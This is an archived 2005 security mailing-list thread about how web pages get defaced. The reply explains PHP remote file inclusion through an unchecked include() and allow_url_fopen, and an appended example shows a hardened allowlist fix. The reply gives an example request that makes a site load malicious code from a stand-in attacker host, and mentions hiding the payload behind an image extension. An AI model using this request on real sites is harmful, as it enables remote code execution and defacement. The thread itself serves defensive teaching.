Security Basics mailing list archives
Re: How webpage defacement possible just using web hacking?
From: Eduardo Kienetz <eduardok () gmail com>
Date: Wed, 9 Mar 2005 13:10:30 -0300
allow_url_fopen should be set to off in your php.ini.

That allows the possibility of exploiting PHP web applications that were not properly written.

Example:
http://www.blabla.com/t.php?page=/comments.php

At the code we suppose:
include($page);

If url_fopen is allowed (and $page is not properly checked) I could just try:
http://www.blabla.com/t.php?page=http://www.bbazdfq.com/maliciuscode.php

Usually the extension is even of an image, but with php code in it.

Regards,
Eduardo Bacchi Kienetz
LPI level 1 Certified

On Wed, 09 Mar 2005 00:55:50 +0000, Monty Ree <chulmin2 () hotmail com> wrote:
Hello, all.

Some days ago, a site was defaced by web hacking. I guess that some attacker gained web server permission using a web application vuln. and changed the index file.

Surely, the attacker gained just nobody privilege (web server user), not root privilege, and the index file permission is 644, owned by another user (and there is no write permission on the directory).

I guess that it is impossible to change the index file with just nobody privilege. But most webpage defacement occurs using a web application vuln. in php or cgi or something like that. Of course, it is possible that a vulnerable cgi is set suid, but most are not.

Any idea?

Thanks in advance.
-- Eduardo Bacchi Kienetz http://www.noticiaslinux.com.br/eduardo/
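
A hardened form of the `include($page)` pattern described in the message above, as an added example that is not part of the original post: the `page` parameter is treated as a key into an allowlist, never as a path or URL. The function name `resolve_page`, the page names and the temporary directory are assumptions for illustration.

```php
<?php
// Added example, not code from the thread. Names and paths are hypothetical.
// php.ini side: allow_url_fopen = Off, as the message recommends. Since PHP 5.2.0
// a separate directive, allow_url_include (default Off), governs include/require of URLs.

// Vulnerable pattern from the message, kept only for comparison:
//   include($page);   // $page taken straight from ?page=...

/**
 * Map a request parameter to a file the application is willing to include.
 * Returns an absolute path, or null if the request must be rejected.
 */
function resolve_page(string $requested, string $baseDir, array $allowed): ?string
{
    // 1. Allowlist: the parameter selects an entry; it is never used as a path.
    if (!array_key_exists($requested, $allowed)) {
        return null;
    }
    // 2. Defence in depth: the resolved file must exist inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample setup so the script runs offline.
$baseDir = sys_get_temp_dir() . '/pages_demo_' . getmypid();
@mkdir($baseDir);
file_put_contents("$baseDir/comments.php", '<?php echo "comments page\n";');
$allowed = ['comments' => 'comments.php'];

// Constructed request values: one legitimate key, then the two shapes from the message.
$requests = ['comments', '/comments.php', 'http://www.bbazdfq.com/maliciuscode.php'];
foreach ($requests as $page) {
    $file = resolve_page($page, $baseDir, $allowed);
    if ($file === null) {
        echo "rejected: $page\n";   // a real application would answer 404 and log the value
        continue;
    }
    include $file;                  // only ever a path chosen by the application
}
unlink("$baseDir/comments.php");
rmdir($baseDir);
```

Only the `comments` key is included; the raw path and the remote URL are both rejected before `include` is reached, regardless of how `allow_url_fopen` is set.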